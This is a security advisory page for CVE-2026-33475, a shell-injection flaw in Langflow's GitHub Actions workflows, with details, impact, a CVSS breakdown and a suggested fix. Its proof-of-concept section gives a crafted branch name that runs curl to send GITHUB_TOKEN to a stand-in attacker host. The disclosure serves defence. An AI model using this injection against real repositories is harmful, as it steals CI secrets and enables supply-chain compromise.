HOMEVULNERABILITIESCVE-2026-33475
CRITICAL

CVE-2026-33475

CWE-74Published: March 24, 2026· Updated: Mar 24, 2026

9.1
CVSS v3.1
EPSS:0.05%probability of exploitation in 30 daysPercentile:16.1th

Official Description

Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.

---

### Details

Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:

```yaml

run: |

validate_branch_name "${{ github.event.pull_request.head.ref }}"

```

Or:

```yaml

run: npx playwright install ${{ inputs.browsers }} --with-deps

```

Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.

---

### PoC

1. **Fork** the Langflow repository

2. **Create a new branch** with the name:

```bash

injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN

```

3. **Open a Pull Request** to the main branch from the new branch

4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)

5. The `run:` step containing:

```yaml

echo "Branch: ${{ github.head_ref }}"

```

Will execute:

```bash

echo "Branch: injection-test"

curl https://attacker.site/exfil?token=$GITHUB_TOKEN

```

6. The attacker receives the CI secret via the exfil URL.

---

### Impact

- **Type:** Shell Injection / Remote Code Execution in CI

- **Scope:** Any public Langflow fork with GitHub Actions enabled

- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data

---

### Suggested Fix

Refactor affected workflows to **use environment variables** and wrap them in **double quotes**:

```yaml

env:

BRANCH_NAME: ${{ github.head_ref }}

run: |

echo "Branch is: \"$BRANCH_NAME\""

```

Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.

---

### Affected Files (Langflow `1.3.4`)

- `.github/actions/install-playwright/action.yml`

- `.github/workflows/deploy-docs-draft.yml`

- `.github/workflows/docker-build.yml`

- `.github/workflows/release_nightly.yml`

- `.github/workflows/python_test.yml`

- `.github/workflows/typescript_test.yml`

NVD Source

Technical Analysis

CVE-2026-33475 can be exploited remotely over the network without requiring physical or adjacent access, significantly expanding the attack surface for threat actors.

The vulnerability requires no privileges and no user interaction, making it a prime target for automated exploitation campaigns and worm-like propagation.

A successful exploit results in complete confidentiality breach (data exposure), full integrity compromise (data manipulation), with a CVSS base score of 9.1.

CVSS v3.1 Vector Breakdown

Exploitability
Attack VectorNetwork
Attack ComplexityLow
Privileges Req.None
User InteractionNone
ScopeUnchanged
Impact
ConfidentialityHigh
IntegrityHigh
AvailabilityNone
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Affected Vendors & Products

langflow1 product
langflow
Source: NVD CPE · 1 total CPE entries

Exploit & PoC Resources

NO KNOWN EXPLOITNo public exploit confirmed at this time
External links open in a new tab. Always verify in a controlled environment before use.

Official Patches & Advisories

All References (1)

Quick Facts

CVE IDCVE-2026-33475
CVSS Score9.1 / 10
SeverityCRITICAL
WeaknessCWE-74
CISA KEVNo
EPSS (30d)0.05%
Affected1 vendor
PublishedMar 24, 2026

Related CVEs (CWE-74)

Recommended Actions

  • Apply vendor patches immediately
  • Monitor CVE-2026-33475 in threat intel feeds
  • Review IDS/IPS signatures for exploitation attempts
Data sourced from NVD (NIST), CISA KEV, and EPSS (FIRST). Analysis generated by CTIWATCH.COM. CVE data is provided under the NVD usage policy.